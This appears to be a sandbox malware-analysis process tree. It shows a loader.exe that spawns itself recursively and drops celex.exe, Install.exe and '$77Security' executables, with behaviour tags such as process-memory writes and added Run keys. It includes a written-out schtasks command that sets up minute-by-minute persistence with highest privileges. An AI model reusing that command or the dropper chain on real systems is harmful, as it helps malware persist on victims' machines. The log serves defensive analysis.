C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"11⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"12⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"13⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"14⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"16⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"17⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"18⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"19⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"20⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"21⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"22⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"23⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"24⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"25⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"26⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"27⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"28⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"29⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"30⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"31⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"32⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"33⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"34⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"35⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"36⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"37⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"38⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"39⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"40⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"41⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"42⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"43⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"44⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"45⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"46⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"47⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"48⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"49⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"50⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"51⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"52⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"53⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"54⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"55⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"56⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"57⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"58⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"59⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"60⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"61⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"62⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"63⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"64⤵
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"65⤵
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"65⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"64⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"65⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"63⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"64⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"62⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"63⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"61⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"62⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"60⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"61⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"59⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"60⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"58⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"59⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"57⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"58⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"56⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"57⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"55⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"56⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"54⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"55⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"53⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"54⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"52⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"53⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"51⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"52⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"50⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"51⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"49⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"50⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"48⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"49⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"47⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"48⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"46⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"47⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"45⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"46⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"44⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"45⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"43⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"44⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"42⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"43⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"41⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"42⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"40⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"41⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"39⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"40⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"38⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"39⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"37⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"38⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"36⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"37⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"35⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"36⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"34⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"35⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"33⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"34⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"32⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"33⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"31⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"32⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"30⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"31⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"29⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"30⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"28⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"29⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"27⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"28⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"26⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"27⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"25⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"26⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"24⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"25⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"23⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"24⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"22⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"23⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"21⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"22⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"20⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"21⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"19⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"20⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"18⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"19⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"17⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"18⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"16⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"17⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"15⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"16⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"14⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"15⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"13⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"14⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"13⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"12⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"11⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"10⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"9⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"8⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"7⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"6⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\$77Security2.exe"C:\Users\Admin\AppData\Local\Temp\$77Security2.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\$77Security.exe"C:\Users\Admin\AppData\Local\Temp\$77Security.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"5⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\celex.exe"C:\Users\Admin\AppData\Local\Temp\celex.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\$77Security2.exe"C:\Users\Admin\AppData\Local\Temp\$77Security2.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Security2" /tr "C:\Users\Admin\AppData\Roaming\$77Security2.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "$77Security2"5⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp43F9.tmp.bat""5⤵
-
C:\Windows\system32\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\$77Security.exe"C:\Users\Admin\AppData\Local\Temp\$77Security.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE6A7.tmp.bat""5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
C:\Windows\system32\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"4⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 5c385c402f58c3357e1f5c7e32dd2578 TMOOk6zgwEyHyad6Wb9mcg.0.1.0.0.01⤵
- Sets service image path in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
